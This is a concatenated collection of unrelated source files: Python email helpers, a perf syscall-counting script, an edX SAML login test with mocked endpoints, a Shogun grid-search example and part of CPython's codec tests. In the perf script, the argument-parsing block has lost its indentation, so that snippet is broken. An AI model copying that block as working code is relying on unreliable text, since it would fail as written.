    <20020201195627.33539.96671@nightshade.la.mastaler.com>

    Optional idstring, if given, strengthens the uniqueness of the id.
    """
    utcdate = time.strftime('%Y%m%d%H%M%S', time.gmtime(time.time()))
    suffix = '' if idstring is None else '.' + idstring
    # timestamp . pid . random [. idstring] @ fqdn
    return '<%s.%s.%s%s@%s>' % (utcdate, os.getpid(),
                                random.randrange(100000), suffix,
                                socket.getfqdn())
# These functions are in the standalone mimelib version only because they've
# subsequently been fixed in the latest Python versions. We use this to worm
# around broken older Pythons.
def parsedate(data):
    """Wrapper over email._parseaddr.parsedate that tolerates empty input."""
    # Older parsedate implementations choke on a false value; short-circuit.
    return _parsedate(data) if data else None
def parsedate_tz(data):
    """Wrapper over email._parseaddr.parsedate_tz tolerating empty input."""
    return _parsedate_tz(data) if data else None
def parseaddr(addr):
    """Parse *addr* into a (realname, email_address) 2-tuple.

    Returns ('', '') when nothing parseable is found.
    """
    parsed = _AddressList(addr).addresslist
    return parsed[0] if parsed else ('', '')
# rfc822.unquote() doesn't properly de-backslash-ify in Python pre-2.3.
def unquote(str):
    """Remove surrounding double quotes or angle brackets from a string.

    Quoted strings also have their backslash escapes undone.
    """
    if len(str) <= 1:
        return str
    if str.startswith('"') and str.endswith('"'):
        inner = str[1:-1]
        return inner.replace('\\\\', '\\').replace('\\"', '"')
    if str.startswith('<') and str.endswith('>'):
        return str[1:-1]
    return str
# RFC2231-related functions - parameter encoding and decoding
def decode_rfc2231(s):
    """Decode string according to RFC 2231.

    Returns the [charset, language, value] triple when *s* is in extended
    form, otherwise (None, None, s).
    """
    fields = s.split("'", 2)
    if len(fields) > 2:
        return fields
    return None, None, s
def encode_rfc2231(s, charset=None, language=None):
    """Encode string according to RFC 2231.

    Without charset and language the %-quoted string is returned as-is;
    otherwise the charset'language'value extended form is produced (an
    omitted language becomes the empty string).
    """
    import urllib
    quoted = urllib.quote(s, safe='')
    if charset is None and language is None:
        return quoted
    if language is None:
        language = ''
    return "%s'%s'%s" % (charset, language, quoted)
# Matches RFC 2231 continuation parameter names like "title*0" / "title*1*";
# a trailing "*" marks a %-encoded segment.
rfc2231_continuation = re.compile(r'^(?P<name>\w+)\*((?P<num>[0-9]+)\*?)?$')
def decode_params(params):
    """Decode parameters list according to RFC 2231.

    params is a sequence of 2-tuples containing (param name, string value).
    Continuation segments (name*0, name*1*, ...) are merged back into a
    single parameter; extended values come back as (charset, language,
    value) triples.
    """
    # Copy params so we don't mess with the original
    params = params[:]
    new_params = []
    # Map parameter's name to a list of continuations.  The values are a
    # 3-tuple of the continuation number, the string value, and a flag
    # specifying whether a particular segment is %-encoded.
    rfc2231_params = {}
    # The first element is the Content-Type/Disposition value itself.
    name, value = params.pop(0)
    new_params.append((name, value))
    while params:
        name, value = params.pop(0)
        # A trailing '*' on the name marks a %-encoded (extended) segment.
        if name.endswith('*'):
            encoded = True
        else:
            encoded = False
        value = unquote(value)
        mo = rfc2231_continuation.match(name)
        if mo:
            name, num = mo.group('name', 'num')
            if num is not None:
                num = int(num)
            rfc2231_params.setdefault(name, []).append((num, value, encoded))
        else:
            # Plain, non-continued parameter: re-quote and keep as-is.
            new_params.append((name, '"%s"' % quote(value)))
    if rfc2231_params:
        for name, continuations in rfc2231_params.items():
            value = []
            extended = False
            # Sort by number
            continuations.sort()
            # And now append all values in numerical order, converting
            # %-encodings for the encoded segments.  If any of the
            # continuation names ends in a *, then the entire string, after
            # decoding segments and concatenating, must have the charset and
            # language specifiers at the beginning of the string.
            for num, s, encoded in continuations:
                if encoded:
                    # NOTE(review): urllib.unquote is the Python 2 API; this
                    # module predates the urllib.parse split.
                    s = urllib.unquote(s)
                    extended = True
                value.append(s)
            value = quote(EMPTYSTRING.join(value))
            if extended:
                charset, language, value = decode_rfc2231(value)
                new_params.append((name, (charset, language, '"%s"' % value)))
            else:
                new_params.append((name, '"%s"' % value))
    return new_params
def collapse_rfc2231_value(value, errors='replace',
                           fallback_charset='us-ascii'):
    """Collapse an RFC 2231 (charset, language, value) triple — or a plain
    string — into a single unicode value.

    Decoding errors are handled per *errors*; an unknown charset falls back
    to *fallback_charset*.
    """
    if not isinstance(value, tuple):
        return unquote(value)
    rawval = unquote(value[2])
    charset = value[0] or 'us-ascii'
    try:
        return unicode(rawval, charset, errors)
    except LookupError:
        # Charset unknown to Python: decode with the fallback instead of
        # failing outright.
        return unicode(rawval, fallback_charset, errors)
| mpl-2.0 |
kornyone/google-kernel-steelhead | tools/perf/scripts/python/syscall-counts-by-pid.py | 11180 | 1927 | # system call counts, by pid
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os, sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts-by-pid.py [comm]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
	# Called once by perf before any events are processed.
	print "Press control+C to stop and show the summary"
def trace_end():
	# Called once by perf after the last event; emit the summary table.
	print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
	common_secs, common_nsecs, common_pid, common_comm,
	id, args):
	# perf calls this for every raw sys_enter tracepoint event.
	# Drop events excluded by the optional [comm]/[pid] filter.
	if for_comm and common_comm != for_comm:
		return
	if for_pid and common_pid != for_pid:
		return
	# `syscalls` is an autodict, so intermediate levels spring into
	# existence; an uninitialized leaf raises TypeError on +=.
	counts = syscalls[common_comm][common_pid]
	try:
		counts[id] += 1
	except TypeError:
		counts[id] = 1
def print_syscall_totals():
    # Print a table of syscall counts grouped by comm and pid, with the
    # most frequently used syscalls first within each pid.
    if for_comm is not None:
        print "\nsyscall events for %s:\n\n" % (for_comm),
    else:
        print "\nsyscall events by comm/pid:\n\n",
    print "%-40s %10s\n" % ("comm [pid]/syscalls", "count"),
    print "%-40s %10s\n" % ("----------------------------------------", \
        "----------"),
    comm_keys = syscalls.keys()
    for comm in comm_keys:
        pid_keys = syscalls[comm].keys()
        for pid in pid_keys:
            print "\n%s [%d]\n" % (comm, pid),
            id_keys = syscalls[comm][pid].keys()
            # Sort by (count, id) descending so the hottest syscalls lead.
            for id, val in sorted(syscalls[comm][pid].iteritems(), \
                    key = lambda(k, v): (v, k), reverse = True):
                print " %-38s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
kursitet/edx-platform | common/djangoapps/third_party_auth/tests/specs/test_testshib.py | 46 | 5259 | """
Third_party_auth integration tests using a mock version of the TestShib provider
"""
import unittest
import httpretty
from mock import patch
from third_party_auth.tasks import fetch_saml_metadata
from third_party_auth.tests import testutil
from .base import IntegrationTestMixin
# Entity ID, metadata URL and SSO endpoint of the TestShib test Identity
# Provider.  Network access to these is mocked via httpretty in the tests.
TESTSHIB_ENTITY_ID = 'https://idp.testshib.org/idp/shibboleth'
TESTSHIB_METADATA_URL = 'https://mock.testshib.org/metadata/testshib-providers.xml'
TESTSHIB_SSO_URL = 'https://idp.testshib.org/idp/profile/SAML2/Redirect/SSO'
@unittest.skipUnless(testutil.AUTH_FEATURE_ENABLED, 'third_party_auth not enabled')
class TestShibIntegrationTest(IntegrationTestMixin, testutil.SAMLTestCase):
    """
    TestShib provider Integration Test, to test SAML functionality
    """
    PROVIDER_ID = "saml-testshib"
    PROVIDER_NAME = "TestShib"
    PROVIDER_BACKEND = "tpa-saml"
    USER_EMAIL = "myself@testshib.org"
    USER_NAME = "Me Myself And I"
    USER_USERNAME = "myself"

    def setUp(self):
        """ Enable SAML, mock TestShib's HTTP endpoints, and pin time/request IDs """
        super(TestShibIntegrationTest, self).setUp()
        self.enable_saml(
            private_key=self._get_private_key(),
            public_key=self._get_public_key(),
            entity_id="https://saml.example.none",
        )
        # Mock out HTTP requests that may be made to TestShib:
        httpretty.enable()

        def metadata_callback(_request, _uri, headers):
            """ Return a cached copy of TestShib's metadata by reading it from disk """
            return (200, headers, self.read_data_file('testshib_metadata.xml'))
        httpretty.register_uri(httpretty.GET, TESTSHIB_METADATA_URL, content_type='text/xml', body=metadata_callback)
        self.addCleanup(httpretty.disable)
        self.addCleanup(httpretty.reset)
        # Configure the SAML library to use the same request ID for every request.
        # Doing this and freezing the time allows us to play back recorded request/response pairs
        uid_patch = patch('onelogin.saml2.utils.OneLogin_Saml2_Utils.generate_unique_id', return_value='TESTID')
        uid_patch.start()
        self.addCleanup(uid_patch.stop)
        self._freeze_time(timestamp=1434326820)  # This is the time when the saved request/response was recorded.

    def test_login_before_metadata_fetched(self):
        # If the IdP's metadata has not been fetched yet, login must fail
        # gracefully with a redirect and an error message, not a crash.
        self._configure_testshib_provider(fetch_metadata=False)
        # The user goes to the login page, and sees a button to login with TestShib:
        testshib_login_url = self._check_login_page()
        # The user clicks on the TestShib button:
        try_login_response = self.client.get(testshib_login_url)
        # The user should be redirected to back to the login page:
        self.assertEqual(try_login_response.status_code, 302)
        self.assertEqual(try_login_response['Location'], self.url_prefix + self.login_page_url)
        # When loading the login page, the user will see an error message:
        response = self.client.get(self.login_page_url)
        self.assertEqual(response.status_code, 200)
        self.assertIn('Authentication with TestShib is currently unavailable.', response.content)

    def test_login(self):
        """ Configure TestShib before running the login test """
        self._configure_testshib_provider()
        super(TestShibIntegrationTest, self).test_login()

    def test_register(self):
        """ Configure TestShib before running the register test """
        self._configure_testshib_provider()
        super(TestShibIntegrationTest, self).test_register()

    def _freeze_time(self, timestamp):
        """ Mock the current time for SAML, so we can replay canned requests/responses """
        now_patch = patch('onelogin.saml2.utils.OneLogin_Saml2_Utils.now', return_value=timestamp)
        now_patch.start()
        self.addCleanup(now_patch.stop)

    def _configure_testshib_provider(self, **kwargs):
        """ Enable and configure the TestShib SAML IdP as a third_party_auth provider """
        fetch_metadata = kwargs.pop('fetch_metadata', True)
        kwargs.setdefault('name', 'TestShib')
        kwargs.setdefault('enabled', True)
        kwargs.setdefault('idp_slug', 'testshib')
        kwargs.setdefault('entity_id', TESTSHIB_ENTITY_ID)
        kwargs.setdefault('metadata_source', TESTSHIB_METADATA_URL)
        kwargs.setdefault('icon_class', 'fa-university')
        kwargs.setdefault('attr_email', 'urn:oid:1.3.6.1.4.1.5923.1.1.1.6')  # eduPersonPrincipalName
        self.configure_saml_provider(**kwargs)
        if fetch_metadata:
            # The metadata fetch must hit the httpretty mock, not the network.
            self.assertTrue(httpretty.is_enabled())
            num_changed, num_failed, num_total = fetch_saml_metadata()
            self.assertEqual(num_failed, 0)
            self.assertEqual(num_changed, 1)
            self.assertEqual(num_total, 1)

    def do_provider_login(self, provider_redirect_url):
        """ Mocked: the user logs in to TestShib and then gets redirected back """
        # The SAML provider (TestShib) will authenticate the user, then get the browser to POST a response:
        self.assertTrue(provider_redirect_url.startswith(TESTSHIB_SSO_URL))
        return self.client.post(
            self.complete_url,
            content_type='application/x-www-form-urlencoded',
            data=self.read_data_file('testshib_response.txt'),
        )
| agpl-3.0 |
Ialong/shogun | examples/undocumented/python_modular/modelselection_grid_search_liblinear_modular.py | 26 | 3062 | #!/usr/bin/env python
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Written (W) 2011 Heiko Strathmann
# Copyright (C) 2011 Berlin Institute of Technology and Max-Planck-Society
#
from numpy.random import randn
from numpy import *
# Build two overlapping 2-D Gaussian point clouds as training data: the
# negative class is shifted by -vec_distance, the positive class by
# +vec_distance, so the classes partially overlap.
num_vectors = 100
vec_distance = 1
_negative_cloud = randn(2, num_vectors) - vec_distance
_positive_cloud = randn(2, num_vectors) + vec_distance
traindat = concatenate((_negative_cloud, _positive_cloud), axis=1)
label_traindat = concatenate((-ones(num_vectors), ones(num_vectors)))
parameter_list = [[traindat, label_traindat]]
def modelselection_grid_search_liblinear_modular(traindat=traindat, label_traindat=label_traindat):
    """Grid-search model selection for a LibLinear SVM.

    Cross-validates a LibLinear (L2-regularised, L2-loss) classifier over
    a small grid of C1/C2 regularisation values, selects the best
    combination, applies it to the classifier, and evaluates once more.
    """
    from modshogun import CrossValidation, CrossValidationResult
    from modshogun import ContingencyTableEvaluation, ACCURACY
    from modshogun import StratifiedCrossValidationSplitting
    from modshogun import GridSearchModelSelection
    from modshogun import ModelSelectionParameters, R_EXP
    from modshogun import ParameterCombination
    from modshogun import BinaryLabels
    from modshogun import RealFeatures
    from modshogun import LibLinear, L2R_L2LOSS_SVC

    # Parameter tree describing the search grid for C1 and C2
    # (exponential range built from exponents -1.0 .. 0.0).
    param_tree = ModelSelectionParameters()
    c1_node = ModelSelectionParameters("C1")
    param_tree.append_child(c1_node)
    c1_node.build_values(-1.0, 0.0, R_EXP)
    c2_node = ModelSelectionParameters("C2")
    param_tree.append_child(c2_node)
    c2_node.build_values(-1.0, 0.0, R_EXP)

    # Wrap the raw numpy training data in shogun containers.
    features = RealFeatures(traindat)
    labels = BinaryLabels(label_traindat)

    # The machine under selection.  classifier.print_modsel_params()
    # would list every tunable parameter if needed.
    classifier = LibLinear(L2R_L2LOSS_SVC)

    # 10-fold stratified cross-validation, scored by accuracy.
    splitting = StratifiedCrossValidationSplitting(labels, 10)
    accuracy_eval = ContingencyTableEvaluation(ACCURACY)
    cross_validation = CrossValidation(classifier, features, labels,
                                       splitting, accuracy_eval)
    cross_validation.set_autolock(False)

    # Exhaustive grid search over the parameter tree; select_model()
    # returns the best ParameterCombination found.
    model_selection = GridSearchModelSelection(cross_validation, param_tree)
    best_parameters = model_selection.select_model()

    # Apply the winning parameters and evaluate the tuned classifier.
    best_parameters.apply_to_machine(classifier)
    result = cross_validation.evaluate()
if __name__ == '__main__':
    # Run the example with the first (and only) canned parameter set.
    print('ModelSelectionGridSearchLibLinear')
    example_args = parameter_list[0]
    modelselection_grid_search_liblinear_modular(*example_args)
| gpl-3.0 |
zhjunlang/kbengine | kbe/res/scripts/common/Lib/test/test_codecs.py | 60 | 111483 | import codecs
import contextlib
import io
import locale
import sys
import unittest
import warnings
import encodings
from test import support
# True on Windows Vista (NT 6.0) or newer; some Windows codec behaviour
# (cp65001 error handling) depends on this.  The short-circuit keeps
# sys.getwindowsversion() from being called on non-Windows platforms.
VISTA_OR_LATER = (sys.platform == 'win32'
                  and sys.getwindowsversion().major >= 6)

# sizeof(wchar_t) for this interpreter, or -1 when ctypes is unavailable
# and it cannot be determined.
try:
    import ctypes
except ImportError:
    ctypes = None
    SIZEOF_WCHAR_T = -1
else:
    SIZEOF_WCHAR_T = ctypes.sizeof(ctypes.c_wchar)
def coding_checker(self, coder):
    """Return a checker asserting coder(input) == (expect, len(input)).

    *self* is the TestCase supplying assertEqual; *coder* is a stateless
    encode/decode function returning an (output, consumed) pair.
    """
    def check(input, expect):
        actual = coder(input)
        self.assertEqual(actual, (expect, len(input)))
    return check
class Queue(object):
    """
    queue: write bytes at one end, read bytes from the other end
    """

    def __init__(self, buffer):
        # Pending, not-yet-read data.  Seeded with the caller-supplied
        # (possibly empty) object so reads keep the buffer's type.
        self._buffer = buffer

    def write(self, chars):
        # Append new data at the tail of the queue.
        self._buffer += chars

    def read(self, size=-1):
        # A negative size drains the whole queue in one call.
        if size < 0:
            drained = self._buffer
            self._buffer = self._buffer[:0]  # empty slice preserves type
            return drained
        head, self._buffer = self._buffer[:size], self._buffer[size:]
        return head
class MixInCheckStateHandling:
    """Mixin verifying incremental codec getstate()/setstate() round-trips."""

    def check_state_handling_decode(self, encoding, u, s):
        # Split the encoded bytes s at every possible position, snapshot
        # the incremental decoder's state there, and verify a fresh
        # decoder restored from that state finishes decoding to u.
        for i in range(len(s)+1):
            d = codecs.getincrementaldecoder(encoding)()
            part1 = d.decode(s[:i])
            state = d.getstate()
            self.assertIsInstance(state[1], int)
            # Check that the condition stated in the documentation for
            # IncrementalDecoder.getstate() holds
            if not state[1]:
                # reset decoder to the default state without anything buffered
                d.setstate((state[0][:0], 0))
                # Feeding the previous input may not produce any output
                self.assertTrue(not d.decode(state[0]))
                # The decoder must return to the same state
                self.assertEqual(state, d.getstate())
            # Create a new decoder and set it to the state
            # we extracted from the old one
            d = codecs.getincrementaldecoder(encoding)()
            d.setstate(state)
            part2 = d.decode(s[i:], True)
            self.assertEqual(u, part1+part2)

    def check_state_handling_encode(self, encoding, u, s):
        # Same round-trip check for the incremental encoder: encoding the
        # two halves across a getstate/setstate must equal encoding the
        # whole string at once.
        for i in range(len(u)+1):
            d = codecs.getincrementalencoder(encoding)()
            part1 = d.encode(u[:i])
            state = d.getstate()
            d = codecs.getincrementalencoder(encoding)()
            d.setstate(state)
            part2 = d.encode(u[i:], True)
            self.assertEqual(s, part1+part2)
class ReadTest(MixInCheckStateHandling):
    """Shared stream-reading tests, parameterised by the subclass's
    ``encoding`` attribute."""

    def check_partial(self, input, partialresults):
        # get a StreamReader for the encoding and feed the bytestring version
        # of input to the reader byte by byte. Read everything available from
        # the StreamReader and check that the results equal the appropriate
        # entries from partialresults.
        q = Queue(b"")
        r = codecs.getreader(self.encoding)(q)
        result = ""
        for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
            q.write(bytes([c]))
            result += r.read()
            self.assertEqual(result, partialresult)
        # check that there's nothing left in the buffers
        self.assertEqual(r.read(), "")
        self.assertEqual(r.bytebuffer, b"")
        # do the check again, this time using a incremental decoder
        d = codecs.getincrementaldecoder(self.encoding)()
        result = ""
        for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
            result += d.decode(bytes([c]))
            self.assertEqual(result, partialresult)
        # check that there's nothing left in the buffers
        self.assertEqual(d.decode(b"", True), "")
        self.assertEqual(d.buffer, b"")
        # Check whether the reset method works properly
        d.reset()
        result = ""
        for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
            result += d.decode(bytes([c]))
            self.assertEqual(result, partialresult)
        # check that there's nothing left in the buffers
        self.assertEqual(d.decode(b"", True), "")
        self.assertEqual(d.buffer, b"")
        # check iterdecode()
        encoded = input.encode(self.encoding)
        self.assertEqual(
            input,
            "".join(codecs.iterdecode([bytes([c]) for c in encoded], self.encoding))
        )

    def test_readline(self):
        # Exercise readline() with every supported line ending, with and
        # without keepends, and with a size limit.
        def getreader(input):
            stream = io.BytesIO(input.encode(self.encoding))
            return codecs.getreader(self.encoding)(stream)

        def readalllines(input, keepends=True, size=None):
            reader = getreader(input)
            lines = []
            while True:
                line = reader.readline(size=size, keepends=keepends)
                if not line:
                    break
                lines.append(line)
            return "|".join(lines)

        s = "foo\nbar\r\nbaz\rspam\u2028eggs"
        sexpected = "foo\n|bar\r\n|baz\r|spam\u2028|eggs"
        sexpectednoends = "foo|bar|baz|spam|eggs"
        self.assertEqual(readalllines(s, True), sexpected)
        self.assertEqual(readalllines(s, False), sexpectednoends)
        self.assertEqual(readalllines(s, True, 10), sexpected)
        self.assertEqual(readalllines(s, False, 10), sexpectednoends)

        lineends = ("\n", "\r\n", "\r", "\u2028")
        # Test long lines (multiple calls to read() in readline())
        vw = []
        vwo = []
        for (i, lineend) in enumerate(lineends):
            vw.append((i*200+200)*"\u3042" + lineend)
            vwo.append((i*200+200)*"\u3042")
        self.assertEqual(readalllines("".join(vw), True), "|".join(vw))
        self.assertEqual(readalllines("".join(vw), False), "|".join(vwo))

        # Test lines where the first read might end with \r, so the
        # reader has to look ahead whether this is a lone \r or a \r\n
        for size in range(80):
            for lineend in lineends:
                s = 10*(size*"a" + lineend + "xxx\n")
                reader = getreader(s)
                for i in range(10):
                    self.assertEqual(
                        reader.readline(keepends=True),
                        size*"a" + lineend,
                    )
                    self.assertEqual(
                        reader.readline(keepends=True),
                        "xxx\n",
                    )
                reader = getreader(s)
                for i in range(10):
                    self.assertEqual(
                        reader.readline(keepends=False),
                        size*"a",
                    )
                    self.assertEqual(
                        reader.readline(keepends=False),
                        "xxx",
                    )

    def test_mixed_readline_and_read(self):
        # Interleaving readline()/read()/readlines() must not lose or
        # duplicate data buffered by the reader.
        lines = ["Humpty Dumpty sat on a wall,\n",
                 "Humpty Dumpty had a great fall.\r\n",
                 "All the king's horses and all the king's men\r",
                 "Couldn't put Humpty together again."]
        data = ''.join(lines)
        def getreader():
            stream = io.BytesIO(data.encode(self.encoding))
            return codecs.getreader(self.encoding)(stream)

        # Issue #8260: Test readline() followed by read()
        f = getreader()
        self.assertEqual(f.readline(), lines[0])
        self.assertEqual(f.read(), ''.join(lines[1:]))
        self.assertEqual(f.read(), '')

        # Issue #16636: Test readline() followed by readlines()
        f = getreader()
        self.assertEqual(f.readline(), lines[0])
        self.assertEqual(f.readlines(), lines[1:])
        self.assertEqual(f.read(), '')

        # Test read() followed by read()
        f = getreader()
        self.assertEqual(f.read(size=40, chars=5), data[:5])
        self.assertEqual(f.read(), data[5:])
        self.assertEqual(f.read(), '')

        # Issue #12446: Test read() followed by readlines()
        f = getreader()
        self.assertEqual(f.read(size=40, chars=5), data[:5])
        self.assertEqual(f.readlines(), [lines[0][5:]] + lines[1:])
        self.assertEqual(f.read(), '')

    def test_bug1175396(self):
        # Iterating a reader over realistic multi-line content must
        # reproduce each input line exactly.
        s = [
            '<%!--===================================================\r\n',
            ' BLOG index page: show recent articles,\r\n',
            ' today\'s articles, or articles of a specific date.\r\n',
            '========================================================--%>\r\n',
            '<%@inputencoding="ISO-8859-1"%>\r\n',
            '<%@pagetemplate=TEMPLATE.y%>\r\n',
            '<%@import=import frog.util, frog%>\r\n',
            '<%@import=import frog.objects%>\r\n',
            '<%@import=from frog.storageerrors import StorageError%>\r\n',
            '<%\r\n',
            '\r\n',
            'import logging\r\n',
            'log=logging.getLogger("Snakelets.logger")\r\n',
            '\r\n',
            '\r\n',
            'user=self.SessionCtx.user\r\n',
            'storageEngine=self.SessionCtx.storageEngine\r\n',
            '\r\n',
            '\r\n',
            'def readArticlesFromDate(date, count=None):\r\n',
            ' entryids=storageEngine.listBlogEntries(date)\r\n',
            ' entryids.reverse() # descending\r\n',
            ' if count:\r\n',
            ' entryids=entryids[:count]\r\n',
            ' try:\r\n',
            ' return [ frog.objects.BlogEntry.load(storageEngine, date, Id) for Id in entryids ]\r\n',
            ' except StorageError,x:\r\n',
            ' log.error("Error loading articles: "+str(x))\r\n',
            ' self.abort("cannot load articles")\r\n',
            '\r\n',
            'showdate=None\r\n',
            '\r\n',
            'arg=self.Request.getArg()\r\n',
            'if arg=="today":\r\n',
            ' #-------------------- TODAY\'S ARTICLES\r\n',
            ' self.write("<h2>Today\'s articles</h2>")\r\n',
            ' showdate = frog.util.isodatestr() \r\n',
            ' entries = readArticlesFromDate(showdate)\r\n',
            'elif arg=="active":\r\n',
            ' #-------------------- ACTIVE ARTICLES redirect\r\n',
            ' self.Yredirect("active.y")\r\n',
            'elif arg=="login":\r\n',
            ' #-------------------- LOGIN PAGE redirect\r\n',
            ' self.Yredirect("login.y")\r\n',
            'elif arg=="date":\r\n',
            ' #-------------------- ARTICLES OF A SPECIFIC DATE\r\n',
            ' showdate = self.Request.getParameter("date")\r\n',
            ' self.write("<h2>Articles written on %s</h2>"% frog.util.mediumdatestr(showdate))\r\n',
            ' entries = readArticlesFromDate(showdate)\r\n',
            'else:\r\n',
            ' #-------------------- RECENT ARTICLES\r\n',
            ' self.write("<h2>Recent articles</h2>")\r\n',
            ' dates=storageEngine.listBlogEntryDates()\r\n',
            ' if dates:\r\n',
            ' entries=[]\r\n',
            ' SHOWAMOUNT=10\r\n',
            ' for showdate in dates:\r\n',
            ' entries.extend( readArticlesFromDate(showdate, SHOWAMOUNT-len(entries)) )\r\n',
            ' if len(entries)>=SHOWAMOUNT:\r\n',
            ' break\r\n',
            ' \r\n',
        ]
        stream = io.BytesIO("".join(s).encode(self.encoding))
        reader = codecs.getreader(self.encoding)(stream)
        for (i, line) in enumerate(reader):
            self.assertEqual(line, s[i])

    def test_readlinequeue(self):
        # readline() on a queue-backed reader must handle data arriving
        # in pieces, including a \r that may later become part of \r\n.
        q = Queue(b"")
        writer = codecs.getwriter(self.encoding)(q)
        reader = codecs.getreader(self.encoding)(q)

        # No lineends
        writer.write("foo\r")
        self.assertEqual(reader.readline(keepends=False), "foo")
        writer.write("\nbar\r")
        self.assertEqual(reader.readline(keepends=False), "")
        self.assertEqual(reader.readline(keepends=False), "bar")
        writer.write("baz")
        self.assertEqual(reader.readline(keepends=False), "baz")
        self.assertEqual(reader.readline(keepends=False), "")

        # Lineends
        writer.write("foo\r")
        self.assertEqual(reader.readline(keepends=True), "foo\r")
        writer.write("\nbar\r")
        self.assertEqual(reader.readline(keepends=True), "\n")
        self.assertEqual(reader.readline(keepends=True), "bar\r")
        writer.write("baz")
        self.assertEqual(reader.readline(keepends=True), "baz")
        self.assertEqual(reader.readline(keepends=True), "")
        writer.write("foo\r\n")
        self.assertEqual(reader.readline(keepends=True), "foo\r\n")

    def test_bug1098990_a(self):
        # Long lines must not confuse the reader's internal line joining.
        s1 = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\r\n"
        s2 = "offending line: ladfj askldfj klasdj fskla dfzaskdj fasklfj laskd fjasklfzzzzaa%whereisthis!!!\r\n"
        s3 = "next line.\r\n"

        s = (s1+s2+s3).encode(self.encoding)
        stream = io.BytesIO(s)
        reader = codecs.getreader(self.encoding)(stream)
        self.assertEqual(reader.readline(), s1)
        self.assertEqual(reader.readline(), s2)
        self.assertEqual(reader.readline(), s3)
        self.assertEqual(reader.readline(), "")

    def test_bug1098990_b(self):
        s1 = "aaaaaaaaaaaaaaaaaaaaaaaa\r\n"
        s2 = "bbbbbbbbbbbbbbbbbbbbbbbb\r\n"
        s3 = "stillokay:bbbbxx\r\n"
        s4 = "broken!!!!badbad\r\n"
        s5 = "againokay.\r\n"

        s = (s1+s2+s3+s4+s5).encode(self.encoding)
        stream = io.BytesIO(s)
        reader = codecs.getreader(self.encoding)(stream)
        self.assertEqual(reader.readline(), s1)
        self.assertEqual(reader.readline(), s2)
        self.assertEqual(reader.readline(), s3)
        self.assertEqual(reader.readline(), s4)
        self.assertEqual(reader.readline(), s5)
        self.assertEqual(reader.readline(), "")

    # What an ill-formed (lone-surrogate) sequence decodes to with the
    # "replace" handler; subclasses may override (see UTF8Test).
    ill_formed_sequence_replace = "\ufffd"

    def test_lone_surrogates(self):
        # Lone surrogates must raise on strict encode, and each error
        # handler must produce its documented substitution.
        self.assertRaises(UnicodeEncodeError, "\ud800".encode, self.encoding)
        self.assertEqual("[\uDC80]".encode(self.encoding, "backslashreplace"),
                         "[\\udc80]".encode(self.encoding))
        self.assertEqual("[\uDC80]".encode(self.encoding, "xmlcharrefreplace"),
                         "[&#56448;]".encode(self.encoding))
        self.assertEqual("[\uDC80]".encode(self.encoding, "ignore"),
                         "[]".encode(self.encoding))
        self.assertEqual("[\uDC80]".encode(self.encoding, "replace"),
                         "[?]".encode(self.encoding))

        # sequential surrogate characters
        bom = "".encode(self.encoding)
        for before, after in [("\U00010fff", "A"), ("[", "]"),
                              ("A", "\U00010fff")]:
            before_sequence = before.encode(self.encoding)[len(bom):]
            after_sequence = after.encode(self.encoding)[len(bom):]
            test_string = before + "\uDC80" + after
            test_sequence = (bom + before_sequence +
                             self.ill_formed_sequence + after_sequence)
            self.assertRaises(UnicodeDecodeError, test_sequence.decode,
                              self.encoding)
            self.assertEqual(test_string.encode(self.encoding,
                                                "surrogatepass"),
                             test_sequence)
            self.assertEqual(test_sequence.decode(self.encoding,
                                                  "surrogatepass"),
                             test_string)
            self.assertEqual(test_sequence.decode(self.encoding, "ignore"),
                             before + after)
            self.assertEqual(test_sequence.decode(self.encoding, "replace"),
                             before + self.ill_formed_sequence_replace + after)
class UTF32Test(ReadTest, unittest.TestCase):
    encoding = "utf-32"
    # A lone low surrogate (U+DC80) in native byte order -- ill-formed
    # input for the inherited surrogate tests.
    if sys.byteorder == 'little':
        ill_formed_sequence = b"\x80\xdc\x00\x00"
    else:
        ill_formed_sequence = b"\x00\x00\xdc\x80"

    # "spamspam" encoded with a single leading BOM, little/big endian.
    spamle = (b'\xff\xfe\x00\x00'
              b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00'
              b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00')
    spambe = (b'\x00\x00\xfe\xff'
              b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m'
              b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m')

    def test_only_one_bom(self):
        _,_,reader,writer = codecs.lookup(self.encoding)
        # encode some stream
        s = io.BytesIO()
        f = writer(s)
        f.write("spam")
        f.write("spam")
        d = s.getvalue()
        # check whether there is exactly one BOM in it
        self.assertTrue(d == self.spamle or d == self.spambe)
        # try to read it back
        s = io.BytesIO(d)
        f = reader(s)
        self.assertEqual(f.read(), "spamspam")

    def test_badbom(self):
        # An invalid BOM must raise UnicodeError on read.
        s = io.BytesIO(4*b"\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

        s = io.BytesIO(8*b"\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

    def test_partial(self):
        # Expected incremental output after each input byte (4 bytes of
        # BOM first, then 4 bytes per code point).
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "", # first byte of BOM read
                "", # second byte of BOM read
                "", # third byte of BOM read
                "", # fourth byte of BOM read => byteorder known
                "",
                "",
                "",
                "\x00",
                "\x00",
                "\x00",
                "\x00",
